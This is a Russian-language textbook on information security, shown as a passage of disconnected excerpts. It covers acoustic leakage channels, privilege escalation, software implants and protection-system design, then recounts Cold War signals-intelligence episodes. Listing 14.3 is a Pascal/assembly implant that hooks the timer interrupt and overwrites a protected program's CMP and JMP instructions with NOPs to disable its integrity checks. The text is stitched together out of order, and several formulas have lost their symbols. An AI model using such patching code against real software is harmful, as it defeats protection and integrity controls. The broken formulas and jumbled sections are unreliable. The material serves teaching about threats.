распространение акустических колебаний в свободном воздушном пространстве;
воздействия звуковых колебаний на элементы и конструкции зданий;
воздействия звуковых колебаний на технические средства обработки информации.
Рис. 6.4. Образование акустических каналов
Механические колебания стен, перекрытий, трубопроводов, возникающие в одном месте от воздействия на них источников звука, передаются по строительным конструкциям на значительные расстояния, почти не затухая, не ослабляясь, и излучаются в воздух как слышимый звук. Опасность такого акустического канала утечки информации по элементам здания состоит в большой и неконтролируемой дальности распространения звуковых волн, преобразованных в упругие продольные волны в стенах и перекрытиях, что позволяет прослушивать разговоры на значительных расстояниях.
Еще один канал утечки акустической информации образуют системы воздушной вентиляции помещений, различные вытяжные системы и системы подачи чистого воздуха. Возможности образования таких каналов определяются конструктивными особенностями воздуховодов и акустическими характеристиками их элементов: задвижек, переходов, распределителей и др.
Канал утечки речевой информации можно представить в виде схемы, приведенной на рис. 6.5.
Рис. 6.5. Схема канала утечки речевой информации
При этом
N = L = 20 lg , а Р = 2×10-5×10 [Па]
Среды распространения речевой информации по способу переноса звуковых волн делятся на:
среды с воздушным переносом;
среды с материальным переносом (монолит);
среды с мембранным переносом (колебания стекол).
Среда распространения определяет звукоизоляцию, которая характеризуется коэффициентом звукопроницаемости:
t = ;
для диффузного поля
t = sin 2q dq
Диффузное поле — это результат наложения множества плоских волн со случайными направлениями фаз амплитуд (однородных, пространственных) от различных источников.
Количество источников для создания диффузного поля
n » 10 , иногда L
Расширение полномочий
Если на предыдущем этапе злоумышленник получил несанкционированный доступ на гостевом или пользовательском уровне он, как правило, постарается расширить свои полномочия и получить, как минимум, административный уровень. Для этого в большинстве случаев применяются такие же средства взлома и подбора паролей, а также программы взлома, что и при доступе на локальном уровне.
Расширение полномочий позволяет злоумышленнику не только получить полный доступ к интересующей его АС, но и внести себя в список легальных администраторов, а также, возможно, сразу же получить административный доступ к другим АС организации.
Разделение секрета для произвольныхструктур доступа
Начнем с формальной математической модели. Имеется n+1 множество S0, S1, …, Sn и (совместное) распределение вероятностей P на их декартовом произведении S = S0 * …* Sn. Соответствующие случайные величины обозначаются через Si. Имеется также некоторое множество Г подмножеств множества {1, …, n}, называемое структурой доступа.
Разрушающие программные средства
Программными закладками называются своеобразные программы, использующие вирусную технологию скрытного внедрения, распространения и активизации. Однако, в отличие от вирусов, которые просто уничтожают информацию, программные закладки, прежде всего, предназначены для ее несанкционированного скрытного получения. Типичная программная закладка может, например, сохранять вводимую с клавиатуры информацию (в том числе и пароли) в нескольких зарезервированных для этого секторах, а затем пересылать накопленные данные по сети на компьютер злоумышленника.
Программные закладки можно классифицировать по методу и месту их внедрения и применения (т.е. по способу доставки в систему).
1. Закладки, ассоциированные с программно-аппаратной средой.
2. Закладки, ассоциированные с программами первичной загрузки.
3. Закладки, ассоциированные с загрузкой драйверов, командного интерпретатора, сетевых драйверов, т.е. с загрузкой операционной среды.
4. Закладки, ассоциированные с прикладным программным обеспечением общего назначения (встроенные клавиатурные и экранные драйверы, программы тестирования ПЭВМ, утилиты и оболочки).
5. Используемые модули, содержащие только код закладки (как правило, внедряемые в пакетные файлы типа BAT).
6. Модули-имитаторы, совпадающие с некоторыми программами, требующими ввода конфиденциальной информации (по внешнему виду).
7. Закладки, маскируемые под программные средства оптимизационного назначения (архиваторы, ускорители и т.д.).
8. Закладки, маскируемые под программные средства игрового и развлекательного назначения (как правило, используются для первичного внедрения закладок типа “исследователь”).
Для того чтобы закладка смогла выполнить какие-либо функции, она должна получить управление, т.е. процессор должен начать выполнять инструкции (команды), относящиеся к коду закладки. Это возможно только при одновременном выполнении двух условий:
закладка должна находиться в оперативной памяти до начала работы программы, которая является целью воздействия закладки, следовательно, она должна быть загружена раньше или одновременно с этой программой;
закладка должна активизироваться по некоторому общему, как для закладки, так и для программы, событию, т.е. при выполнении ряда условий в аппаратно-программной среде управление должно быть передано на программу-закладку.
Это достигается путем анализа и обработки закладкой общих для закладки и прикладной программы воздействий (как правило, прерываний). Причем выбираются прерывания, которые наверняка используются прикладной программой или операционной системой. В качестве таких прерываний можно выделить:
прерывания от системного таймера;
прерывания от внешних устройств;
прерывания от клавиатуры;
прерывания при работе с диском;
прерывания операционной среды (в том числе прерывания для работы с файлами и запуска выполняемых модулей).
В противном случае активизации кода закладки не произойдет, и он не сможет оказать какого-либо воздействия на работу программы ЗИ.
Кроме того, возможны случаи, когда при запуске программы (в этом случае активизирующим событием является запуск программы) закладка разрушает некоторую часть кода программы, уже загруженной в оперативную память, и, возможно, систему контроля целостности кода или контроля иных событий и на этом заканчивает свою работу.
Таким образом, можно выделить следующие типы закладок.
1. Резидентная — находится в памяти постоянно с некоторого момента времени до окончания сеанса работы ПЭВМ (выключения питания или перегрузки).
Закладка может быть загружена в память при начальной загрузке ПЭВМ, загрузке операционной среды или запуске некоторой программы (которая по традиции называется вирусоносителем), а также запущена отдельно.
2. Нерезидентная — начинает работу по аналогичному событию, но заканчивают ее самостоятельно по истечению некоторого промежутка времени или некоторому событию, при этом выгружая себя из памяти целиком.
Несанкционированная запись закладкой может происходить:
в массив данных, не совпадающий с пользовательской информацией (хищение информации);
в массив данных, совпадающий с пользовательской информацией и ее подмножества (искажение, уничтожение или навязывание информации закладкой).
Следовательно, можно рассматривать три основные группы деструктивных функций, которые могут выполняться закладками:
сохранение фрагментов информации, возникающей при работе пользователя, прикладных программ, вводе/выводе данных, на локальном или сетевом диске;
разрушение функций самоконтроля или изменение алгоритмов функционирования прикладных программ;
навязывание некоторого режима работы (например, при уничтожении информации — блокирование записи на диск без уничтожения информации), либо навязывание посторонней информации вместо полезной информации при записи последней на диск.
Разрушение программы защиты и схем контроля
Допустим, что злоумышленнику известна интересующая его программа с точностью до команд реализации на конкретном процессоре. Следовательно, возможно смоделировать процесс ее загрузки и выяснить адреса частей программы относительно сегмента оперативной памяти, в которой она загружается.
Это означает, что возможно произвольное изменение кода программы и обеспечение отклонения (как правило, негативного характера) в работе прикладной программы.
Тогда алгоритм действия закладки может быть следующим.
1. Закладка загружается в память каким-либо образом.
2. Закладка осуществляет перехват (редактирование цепочки) одного или нескольких прерываний:
прерывание DOS “запуск программ и загрузка оверлеев” (int 21h, функция 4Bh);
прерывание BIOS “считать сектор” (int 13h, функция 02h);
прерывание от системного таймера (int 08h).
3. По одному из трех событий закладка получает управление на свой код и далее выполняет следующие операции:
проверка принадлежности запущенной программы или уже работающей (для таймерного прерывания) к интересующим программам;
определение сегмента, в который загружена программа;
запись относительно определенного сегмента загрузки некоторых значений в оперативную память так, чтобы отключить схемы контроля и (или) исправить программу нужным образом.
Принципиальная возможность исправления кода следует из того, что вывод о правильности работы программы делается на основе операций сравнения в арифметико-логическом устройстве процессора.
Сравнение результатов работы выполняется командой CMP, а результат сравнения изменяет один или несколько бит регистра флагов. Следовательно, того же результата можно добиться, изменив эти биты в одной из команд работы с регистром флагов типа CLD, CLS, LAHF и т.д.
Наконец, возможен случай, когда содержательный код программы защиты вместе со схемой контроля будет удален из памяти полностью и все последующие операции будут выполнены без влияния программы защиты.
Таким образом, анализируя в данном случае действия закладки, необходимо считать возможным любые искажения кода программ.
Основным способом активизации разрушающих закладок является запуск ассоциированных с ними программ. При этом закладка получает управление первой и выполняет какие-либо действия (изменение адресов прерывания на собственные обработчики, исправление в коде программ защиты и т.д.).
Листинг 14.3. Пример закладки, разрушающей схему контроля
{$M 1024,0,0}
{$I-}
uses
Dos;
const
CMPSeg=$2E7F; { Адреса ячеек, подлежащих модификации, }
CMPOfs=12; { указанные относительно PSP }
JMPSeg=$2EA4;
JMPOfs=2;
var
DOSSeg, DOSOfs, Psp:word;
OldInt8h:pointer;
procedure Int8h; interrupt;
begin
if (Psp=PrefixSeg) then
begin
if(Mem[DOSSeg:DOSOfs]=0) then
asm
mov ah, 62h
int 21h
mov Psp, bx
end;
end
else
begin
MemW[CMPSeg+Psp:CMPOfs]:=$9090; { Запись NOP вместо CMP }
MemW[JMPSeg+Psp:JMPOfs]:=$9090; { Запись NOP вместо JMP }
Окончание листинга 14.3
end;
asm
pushf
call dword ptr OldInt8h
end;
end;
begin
asm
mov ah, 34h
int 21h
mov DOSOfs, bx
mov DOSSeg, es
end;
Psp:=PrefixSeg;
GetIntVec(8, OldInt8h);
SwapVectors;
SetIntVec(8, @Int8h);
Exec('SECURED.EXE', '');
SetIntVec(8, OldInt8h);
SwapVectors;
end.
Часть
Защита информации
Глава 15
Подходы к созданию комплексной системы защиты информации
Для рассмотрения проблемы ЗИ в общем виде выделим в ее предметной области три следующие иерархии: структурную, причинно-следственную и функциональную.
Способы ЗИ зависят от типа информации, формы ее хранения, обработки и передачи, типа носителя информации, а также предполагаемого способа нападения и последствий его по влиянию на информацию (копирование, искажение, уничтожение).
В основном владелец информации не знает где, когда и каким образом будет осуществлено нападение, поэтому ему необходимо обнаружить сам факт нападения.
Определение потенциальной ценности информации позволяет подумать в первую очередь о безопасности наиболее важных секретов, утечка которых способна нанести ущерб.
При этом важно установить.
1. Какая информация нуждается в защите?
2. Кого она может интересовать?
3. Какие элементы информации наиболее ценные?
4. Каков “срок жизни” этих секретов?
5. Во что обойдется их защита?
Опыт применения систем ЗИ (СЗИ) показывает, что эффективной может быть лишь комплексная система защиты информации (КСЗИ), сочетающая следующие меры.
1. Законодательные. Использование законодательных актов, регламентирующих права и обязанности физических и юридических лиц, а также государства в области ЗИ.
2. Морально-этические. Создание и поддержание на объекте такой моральной атмосферы, в которой нарушение регламентированных правил поведения оценивалось бы большинством сотрудников резко негативно.
3. Физические. Создание физических препятствий для доступа посторонних лиц к охраняемой информации.
4. Административные. Организация соответствующего режима секретности, пропускного и внутреннего режима.
5. Технические. Применение электронных и других устройств для ЗИ.
6. Криптографические. Применение шифрования и кодирования для сокрытия обрабатываемой и передаваемой информации от несанкционированного доступа.
7. Программные. Применение программных средств разграничения доступа.
Обоснованный выбор требуемого уровня защиты информации является системообразующей задачей, поскольку как занижение, так и завышение уровня неизбежно ведет к потерям. При этом в последнее время роль данного вопроса резко возросла в связи с тем, что, во-первых, теперь в число защищаемых помимо военных, государственных и ведомственных, включены также секреты промышленные, коммерческие и даже личные, а во-вторых, сама информация все больше становиться товаром. Таким образом, для оценки информации необходимы показатели двух видов:
характеризующие информацию как ресурс, обеспечивающий деятельность общества;
характеризующие информацию как объект труда.
Показатели первого вида носят прагматический характер. К ним относят важность, значимость с точки зрения тех задач, для решения которых используется оцениваемая информация; полнота информации для информационного обеспечения решаемых задач; адекватность, т.е. соответствие текущему состоянию соответствующих объектов или процессов; релевантность информации и ее толерантность.
Показатели второго вида должны характеризовать информацию как объект труда, над которым осуществляются некоторые процедуры в процессе переработки ее с целью информационного обеспечения решаемых задач. К ним относятся: эффективность кодирования информации и ее объем. Методы определения этих показателей достаточно полно разработаны в теории информации.
Разведка конца ХХ века
Одной из самых секретных программ США в конце 70-х годов стало ведение разведки против Советского Союза с использованием подводных лодок. В эту программу входила также сверхсекретная операция “Вьюнок”, которая заключалась в перехвате информации с подводных кабельных линий связи. Американцы надеялись, что русские, считая, что подводные кабели прослушать невозможно, использовали сравнительно несложные шифры, а иногда обходились и без них.
Вначале перехват велся с помощью подводных лодок, вынужденных длительное время стоять над кабелем. Затем военные моряки и специалисты из Агентства национальной безопасности США (АНБ) сумели создать сложный аппарат, который можно было разместить рядом с подводным кабелем связи и оставить там на насколько месяцев без присмотра для записи передаваемых по кабелю сигналов. Этот аппарат американцы окрестили “коконом”. В ходе операций “Вьюнок” один такой “кокон” был прикреплен к советскому подводному кабелю, проложенному по дну Охотского моря от материка до полуострова Камчатка. Подключила его американская подводная лодка, имевшая на борту водолазов, которые произвели установку “кокона” с помощью робота.
Однако в 1981 году на снимках, полученных со спутников, американцы заметили большое скопление советских судов как раз в том месте, где располагался “кокон”. Позже, когда американская субмарина прибыла в район для замены пленок, на которые производилась запись сигналов, она обнаружила, что “кокон” бесследно исчез. В секретном докладе, подготовленном в ВМС США в 1982 году по итогам расследования обстоятельств пропажи “кокона”, полностью отрицалась случайность как причина обнаружения подслушивающего устройства противником. Русские точно знали, где и что искать, утверждалось в докладе.
В 1975 году в передаче канадского телевидения было рассказано о существовании и действительном назначении службы ОСНИС. После этого она была “распущена”… путем перевода в состав Министерства обороны и переименования в Службу безопасности связи (СБС). В результате этого шага, сменив вывеску и “крышу”, радиоразведывательная спецслужба Канады оказалась еще более надежно спрятана от любопытных глаз.
Теперь правительство всегда могла ответить отказом на любые требования общественности отчитаться за свою деятельность в области радиоразведки, прикрываясь соображениями национальной безопасности.
Помимо ведения радиоразведки, сфера интересов СБС распространялась на обеспечение защиты информации при ее передаче по каналам технической связи во всех канадских государственных учреждениях. Например, в задачу сотрудников СБС входила установка и эксплуатация аппаратуры глушения электронных сигналов, которые излучались оборудованием, установленным в местах заседаний кабинета министров. Им же было поручено предостерегать государственных деятелей от ведения конфиденциальных разговоров по сотовой связи. Хотя если учесть, что время от времени сотрудникам СБС приходилось “наблюдать” за конкретным министром, то, скорее всего, они не всегда выполняли свои обязанности, связанные с защитой информации, с необходимой тщательностью. Кто давал СБС подобного рода задания? Не известно, поскольку она была подотчетна только премьер-министру Канады и всегда отличалась весьма вольной трактовкой возложенных на нее функций.
Под свою штаб-квартиру СБС отвела здание на Херон-роуд, доставшееся ей в наследство от ОСНИС в очень плачевном состоянии. Старое кирпичное здание, явно не пригодное для размещения радиоразведывательной аппаратуры, вскоре стало буквально трещать по швам. Дошло до того, что в середине 70-х годов из стен здания на головы прохожих вываливались кирпичи. Однако СБС не желала покидать это место, поскольку лишь отсюда можно было без помех прослушать эфирное пространство над канадской столицей на всех частотах.
Пришлось на время выселить из здания часть сотрудников и срочно заняться ремонтно-восстановительными работами. В ходе этих работ на последнем этаже был сделан бетонный пол. Руководство СБС хотело быть уверенным, что размещенный там 7-тонный компьютер марки Cray, предназначенный для решения дешифровальных задач, не свалится на голову подчиненным в разгар рабочего дня. С тыла к зданию штаб-квартиры СБС был пристроен бетонный бункер без окон и с непроницаемыми для электронного излучения стенами.
В нем разместились дешифровальное оборудование, центр управления радиоразведывательными спутниками, отдел проектирования техники для ведения перехвата и служба безопасности.
В дополнение к перехватывающей аппаратуре, которая была установлена в здании штаб-квартиры на Херон-роуд, в распоряжении СБс имелись два автофургона с электронной начинкой. И хотя официально эти автофургоны были предназначены для защиты правительственных каналов связи от подслушивания со стороны зарубежных радиоразведывательных спецслужб, на деле они легко могли быть переоборудованы в передвижные станции перехвата. Автофургоны были оснащены всевозможными приемными и записывающими устройствами, кондиционерами и автономными электрогенераторами. На них было предусмотрено место для размещения от двух до четырех операторов, в зависимости от сложности проводимой операции.
С середины 70-х годов СБС сосредоточила внимание на добывании информации о советской разведке, которая рассматривала канадскую столицу как удобный плацдарм для проведения разведывательных рейдов против западных стран. Именно в это время, по договоренности с АНБ, в СБС стал поступать обильный перехват с американских радиоразведывательных спутников для дальнейшей обработки и анализа. Помощь СБС понадобилась американцам и англичанам, поскольку в 1975 году они пришли к выводу о том, что для связи со своей агентурой на Западе Советский Союз использовал две спутниковые системы СВЧ-связи, которые американцы окрестили “Амхерст” и “Янина — Уран”. Однако об этих системах практически ничего не было известно, и понадобилось больше года совместных усилий АНБ, ЦПС и СБС, чтобы выяснить, как они функционировали.
Система “Амхерст” принадлежала КГБ. Она состояла из восьми спутников, орбиты которых были подобраны так, чтобы в течение дня любой агент КГБ за рубежом попадал в радиус действия одного из них хотя бы раз. Пролетая над СССР, спутник “загружался” информацией, которую должен был “разгрузить” над заданным регионом планеты. Если агент, которому она предназначалась, успешно ловил ее на свой приемник, то он посылал в Москву короткий сигнал, подтверждавший прием сообщения.
Иначе магнитная пленка с записью этого сообщения перематывалась на начало и оно снова передавалось в эфир. В том случае, когда агенту надо было о чем-то сообщить в Москву, он с помощью СВЧ-передатчика связывался со спутником, тот фиксировал сообщение на магнитной пленке и затем “проигрывал” ее над Советским Союзом.
Запеленговать советского агента было практически невозможно. В первом случае — из-за кратковременности сеанса связи, во втором — из-за узкой диаграммы направленности антенны его передатчика. Слабым звеном в системе “Амхерст” оказались спутники. Дело в том, что на период “разгрузки” они прекращали передачу на Землю специального сигнала, свидетельствовавшего об их исправности. Таким образом, зная время начала и время завершения “разгрузки”, а также частоту, на которой информация “сбрасывалась” со спутника, можно было определить его “след” — зону досягаемости спутникового передатчика. Обычно этот “след” был слишком велик, чтобы по нему одному судить о точном местонахождении агента КГБ. Однако после обнаружения множества таких “следов” (иногда требовалось произвести сотни и даже тысячи замеров) и их пересечений район поисков агента значительно сужался — сначала до размеров города, а затем и до границ конкретного здания.
Труднее пришлось с системой “Янина — Уран”, принадлежавшей ГРУ. Ее четыре спутника с огромной скоростью вращались вокруг Земли по эллиптическим орбитам. Ненадолго подойдя на близкое расстояние, чтобы “загрузиться” или “разгрузиться”, они стремительно уносились с открытый космос. Кроме того, система “Янина — Уран” была “пассивной”. Это означало, что “разгрузка” спутника активировалась сигналом, посылаемым агентом ГРУ. Он определял подходящее время для связи с помощью расписания, показывавшего время пролета спутника на расстоянии, достаточно близком для установления контакта с ним с помощью радиопередатчика. В СБС дело сдвинулось с мертвой точки только после того, как были вычислены параметры орбиты спутников системы “Янина — Уран”.
Успех не заставил себя долго ждать.
С 1976 по 1978 год совместными усилиями СБС и Службы безопасности (СБ) канадской полиции были разоблачены 20 агентов разведки СССР. В 1978 и 1979 годах из Канады были высланы 16 советских дипломатов, обвиненных в деятельности, не совместной с их дипломатическим статусом. Большая часть доказательств, послуживших основанием для экстрадиции, была собрана СБС. Кроме выполнения своих прямых обязанностей каждому сотруднику СБС было поручено докладывать о замеченных им передвижениях иностранцев из Восточной Европы. В связи с этим все служащие СБС получили на руки специальные карточки. На них перечислялись регистрационные номера машин, увидев которые сотрудник СБС должен был сообщить по указанному телефону их марку и цвет, количество пассажиров и чем они занимались. Карточку следовало носить с собой всегда и везде.
В середине 70-х годов в СБС было положено начало еще двум радиоразведывательным операциям против СССР. В ходе одной из них, получившей название “Козерог”, перехватывалась вся дипломатическая переписка между Москвой и советским посольством в Оттаве. Другая была названа “Килдеркин” и имела целью улавливание электронного излучения от оборудования, установленного в стенах посольского комплекса СССР. Был момент, когда показалось, что операция “Килдеркин” сулит крупную удачу. Сотрудники СБС перехватили видеосигнал, исходивший из здания советского посольства. Через несколько месяцев упорной и кропотливой работы этот сигнал был преобразован в изображение на экране монитора. Оказалось, что он был создан видеокамерой, поставленной при входе в посольство и использовавшейся охранниками для наблюдения за прилегающей улицей.
В 1977 году СБС подвергнулась жесткому нажиму со стороны АНБ. Американцы решили, что их канадские коллеги слишком прохладно относятся к сбору радиоразведывательных данных за рубежом, в то время как АНБ и ЦПС с большим риском добывают ценную информацию и для себя, и для своих союзников. Уступив сильному давлению, оказанному на нее директором АНБ, в конце 70-х годов СБС обследовала несколько канадских посольств для выяснения целесообразности установки в них аппаратуры перехвата.
Список посольств был заранее согласован с АНБ. В 1981 году СБС создала центр радиоразведки в Каракасе. Вслед за столицей Венесуэлы наступил черед Абиджана, Бухареста, Кингстона, Нью-Дели, Мехико, Пекина и Рабата.
В результате к концу 80-х годов роль и авторитет СБС в радиоразведывательном сообществе Запада возросли насколько, что ее отношения с АНБ и ЦПС изменились в корне.
Из безропотной помощницы американцев и англичан СБС постепенно превратилась в их полноправную союзницу и стала действовать вполне самостоятельно, без постоянной оглядки на США и Англию.
В 70-е и 80-е годы США и Англия неоднократно обращались к руководству СБС с просьбой помочь им в проведении радиоразведывательных операций, которые АНБ и ЦПС были не в состоянии осуществить своими силами ввиду ограничений, накладываемых законодательствами этих двух стран на подобного рода деятельность.
Так, в 1975 году СБС оказала помощь АНБ в определении местонахождения коротковолнового передатчика, выходившего в эфир в окрестностях Вашингтона. А восемь лет спустя по просьбе английского премьер-министра Тэтчер СБС организовала радиоразведывательное наблюдение за некоторыми членами правительственного кабинета Англии с целью проверки их лояльности по отношению к ней.
Ночью 11 января 1983 года в МИД Франции поступила телеграмма из посольства в Москве. Только глава Кабинета Министров и министр иностранных дел ознакомились с ее содержанием, прежде чем передать Президенту.
Новость была ошеломляющей. Выходило, что со дня установки первого телекса в октябре 1978 года вплоть до 11 января 1983 года КГБ получал информацию обо всех сообщениях, принимавшихся и отсылавшихся посольством Франции в советской столице, включая самые секретные. Два лишних проводника были напрямую подсоединены к электросети. Силовой кабель телекса, следовательно, являлся носителем тока по внешней цепи и передавал информацию за пределы посольского здания. Подключение к конденсатору позволяло перехватывать все сообщения до их шифровки. КГБ добился такого успеха в области радиоразведки, благодаря своим способностям не упускать промахи служб безопасности иностранных посольств.
В данном случае промахов было два.
Во-первых, все шесть телексных аппаратов, предназначенных для установки в посольстве в Москве, были отправлены по железной дороге в грузовых вагонах без всякого сопровождения и охраны и продвигались двое суток по советской территории. Воспользовавшись этим, сотрудники КГБ, заменили обычные конденсаторы другими, снабженными специальным электронным устройством.
Во-вторых, ни во время установки, ни в ходе профилактических осмотров компетентные службы французского посольства в Москве не удосужились снять с корпусов крышки и проверить аппараты. И только после поломки одного из телексов была проведена элементарная проверка и обнаружена закладка.
В 70-е годы в КГБ начали просачиваться сведения о том, что польская служба госбезопасности стала вести себя недружественно по отношению к советским партнерам. Теоретически обе спецслужбы — польская и советская — должны были обратиться к плодотворному сотрудничеству. Однако на практике сотрудничество со стороны КГБ ограничивалось лишь помощью в решении мелких технических вопросов. Гордые поляки не захотели мириться с таким положением дел и постепенно начали проявлять заметную независимость от КГБ при проведении своих разведывательных операций, все больше полагаясь на свои силы.
Вскоре в КГБ заметили, что польская служба госбезопасности утаивает часть собранной ею информации. Следующим шагом, вызвавшим раздражением КГБ, явилась смена поляками ключей в шифраторах советского производства, которые они использовали на своих линиях связи. А затем случилось происшествие, которое заставило по иному взглянуть на союзников СССР по Варшавскому Договору.
Поляки оснастили автомобиль из своего посольского гаража в Москве специальным оборудованием для ведения перехвата и припарковали его прямо под линией энергопитания одного московского оборонного предприятия. Сотрудники польской разведывательной службы были задержаны на месте преступления, когда сидели в своей передвижной станции перехвата и записывали сигналы, излучавшиеся этим предприятием и его коммуникациями.
Поскольку цель, которую преследовала Польша при проведении своей радиоразведывательной акции против СССР, была нелепа, в КГБ предположили худшее, а именно что поляки действовали в интересах враждебных государств. Дальнейшее расследование показало, что возмутившая КГБ операция была проведена службой разведки Польши исключительно по ее собственному почину. Одной из принятых КГБ ответных мер предосторожности стала смена шифровального оборудования в советском посольстве в Варшаве.
У каждой спецслужбы существуют свои национальные особенности, но техника разведки в основном одна и тоже. Разведка стара, как мир и весьма консервативна по духу. Многие поколения разведчиков проходили подготовку в разведшколах, где их на протяжении десятилетий, а то и столетий учили фактически одним и тем же вещам.
Разведка — по преимуществу занятие весьма прозаическое и предстает в романтическом свете разве что в сознании дилетантов. Настоящий разведчик стремится не привлекать к себе лишнего внимания, старается затеряться в толпе. Выделяются из общего ряда немногие. Мир запомнил, например, Мату Хари, но она была скорее наивна, чем опасна. Даже в литературе наиболее реалистические образы разведчиков — это отнюдь не Джеймс Бонд Яна Флеминга, а Дглорнед Смайли и Алек Лимас Джона Ле Каре. Ле Карре пишет: “Для человека вроде Смайли, которому приходится подолгу жить среди врагов своей страны, существует одно главное правило: не привлекай к себе внимания, не дай Бог, тебя кто-нибудь заметит!”
В большинстве своем современные разведчики — это рядовые сотрудники спецслужбы, которые занимаются добыванием информации. Британский историк Тэйлор сказал, что примерно 90% всей информации, с которой имеют дело спецслужбы, можно отыскать в открытых незасекреченных источниках.
Шерман Кент, американский историк, работавший в ЦРУ, “поднял планку” еще выше, до 95%, сделав поправку на беспрецедентную открытость американского общества.
Чтобы доказать свою точку зрения, Кент предложил пяти профессорам Йельского университета подготовить отчет о состоянии Вооруженный Сил США, численности боевых частей и соединений не ниже дивизии, мощи Военно-Морского Флота, и боевой авиации (с описанием кораблей и самолетов), разрешив пользоваться при этом только открытыми источниками информации.
Работа продолжалась три летних месяца. В итоге ученные представили Кенту несколько сотен страниц данных, сопроводив их 30-страничной обобщающей справкой. Оценка Кента была следующей: на 90% отчет ученых соответствовал истинному положению вещей. ЦРУ незамедлительно засекретило результаты проведенной работы, получившей впоследствии название “Йельского отчета”.
Правительствам нужна информация для придания себе большей уверенности в общении друг с другом, для завоевания более выгодной начальной позиции на переговорах по сравнению с позициями оппонентов. Страны должны не только добывать информацию друг о друге, но также анализировать и оценивать ее, — что, собственно, и делает ее разведывательной, и затем знать не только, как ее использовать, но и стоит ли ее использовать.
Казалось бы, единственная цель разведки — получение информации. Однако есть существенная разница между объективными сведениями, которые требуются от разведчика, и политическими интересами.
Прусский король Фридерик II Великий (1712-1786) придавал большое значение заблаговременному сбору сведений о противнике с помощью разведчиков. В его труде “О военных учреждениях” можно прочитать: “На войне приходится действовать то с отвагой льва, то с лукавством лисицы. Где не берет сила, там возьмет хитрость. Поэтому, безусловно, необходимо пользоваться и той, и другой; это составляет один лишний шанс на успех. Часто сила не уступает силе, но часто также хитрость берет верх над силой”.
С той далекой поры прошли сотни лет. Но для современных разведчиков, как и для разведчиков прошлых веков, кроме таких качеств, как верность, надежность, смелость, целеустремленность, сильная воля, обширные знания, способность быстро прогнозировать различные ситуации, устойчивость к стрессам, по-прежнему важны его личные данные: наблюдательность, умение слушать, хорошая память и способность к точному описанию.
В XXI веке роль разведки еще больше возрастает. Действительно, принцип экономической целесообразности разведки, сформулированный Сунь Цзы 2500 лет тому назад, не изменился: “Призывая под свои знамена сотни тысяч людей, и повелевая им преодолевать огромные расстояния, мы оказываемся перед лицом неотвратимости тяжелых потерь и расходования государственных богатств.
Дневные расходы будут насчитывать тысячи унций серебра. Враждебные армии могут стоять напротив друг друга долгие годы, стремясь к победе, которая выявится в течение одного дня. В такой ситуации отсутствие сведений о неприятеле лишь оттого, что некто не решается израсходовать сто унций серебра, является вершиной глупости”.
В XXI веке, когда расходы на проведение любой более-менее серьезной войсковой операции исчисляются сотнями тысяч и даже миллионами долларов в день, становится понятным, чем для государств, заботящемся о своем международном авторитете, может обернуться экономия на разведке.
Поэтому не удивительно, что ведущие державы мира после окончания “холодной войны” не распустили свои специальные службы, а продолжают их поддерживать и развивать. Те же государства бывшего соцлагеря, которые не смогли “удержать удар” и в той или иной степени свернули деятельность своих спецслужб, стали “разменной монетой” в мировой политике.
В этой связи важно понимать, что разведка — это не отдельные личности-супершпионы, а продуманная, сбалансированная, в достаточной степени финансируемая и оберегаемая государством система. Сражения XXI века будут выигрываться не столько силой оружия, сколько силой системы, собирающей информацию о противнике и управляющей информационными потоками, направленными на противника.
В следующей главе рассматриваются принципы организации и структура основных спецслужб ведущих держав мира. Кроме того, учитывая влияние спецслужб бывшего СССР на организацию спецслужб независимых государств, возникших на постсоветском пространстве, в этой главе приведены сведения о структуре таких советских спецслужб, как КГБ и ГРУ.
Глава 3
Спецслужбы ведущих странмира и бывшего СССР
В этой главе мы рассмотрим структуру современных разведывательных служб Соединенных Штатов Америки, Англии, Франции, Германии, Канады и Израиля. Но для начала мы ознакомимся с принципами организации двух спецслужб бывшего СССР, оказавших колоссальное влияние на ход мировой истории в XX веке, — КГБ и ГРУ.Конечно, политические цели и задачи этих служб существенно отличались от текущих политических целей и задач спецслужб, организованных в государствах бывшего СССР. Однако изучение структуры и принципов работы КГБ и ГРУ в сравнении со структурой и принципами работы спецслужб ведущих государств мира позволяет отделить частное от общего. Таким образом, анализ данной информации облегчает понимание принципов развития спецслужб, которыми должно руководствоваться демократическое государство XXI века.
Роль средств технической разведки в XXI веке
Итак, даже столь беглый и поверхностный анализ структуры ведущих разведок мира позволяет сделать вывод о том, что подразделения, занимающиеся добыванием информации по техническим каналам, а также вопросами преодоления программных и аппаратных средств защиты в сфере информационных технологий играли в XX веке, и будут играть в XXI веке не менее важную роль, чем подразделения традиционной разведки. Более того, многие ведущие страны мира выделяют такие подразделения в самостоятельные службы (АНБ США, ЦПС Великобритании и т.п.), бюджет которых иногда значительно превосходит бюджет подразделений традиционной разведки.
Хотя, как показал печальный опыт 11 сентября 2001 года, недооценка возможностей агентурной разведки и ставка на одну лишь техническую разведку чревата весьма серьезными последствиями. Однако это нисколько не умаляет значимость технической разведки. Учитывая бурное развитие информационных технологий, которые все больше и больше становятся важным элементом экономики и политики, понятно, что ни одна спецслужба не станет сворачивать свои программы в области технической разведки.
Однако развитие информационных технологий с точки зрения разведки имеет и негативную сторону — даже такое серьезное ведомство, как АНБ, уже сегодня с трудом справляется с обработкой всего потока информации, циркулирующей в Internet и линиях связи. Если же противник намеренно генерирует избыточную информацию, скрывая истинные сообщения с помощью стенографических методов, задача технической разведки еще больше усложняется. Действительно, если перехваченное сообщение зашифровано, уже можно делать вывод о том, что мы имеем дело с обменом секретной информацией. Если же безобидное на первый взгляд сообщение несет в себе скрытое послание, выявить такое сообщение в общем потоке информации гораздо труднее.
Таким образом, в XXI веке техническая разведка не только не потеряет своей значимости, но и поднимется на качественно иную ступень развития — сегодня ведутся работы по созданию сверхминиатюрных технических устройств, предназначенных для скрытого проникновения на нужные разведке объекты и получения информации; работы по созданию систем искусственного интеллекта, которые смогли бы в автоматическом режиме вести смысловой анализ информации, выявляя в ней скрытый смысл, и другие работы в области высоких технологий.
Вот почему роль средств и методов защиты информации будет все больше и больше усиливаться. Однако, прежде чем рассматривать вопросы собственно защиты информации, следует разобраться в принципах, которые лежат в основе средств и методов ее несанкционированного получения. Этим вопросам и посвящена следующая часть данной книги.
Часть
Каналы утечки информации
Глава 4
Каналы несанкционированного получения информации
Российская разведка
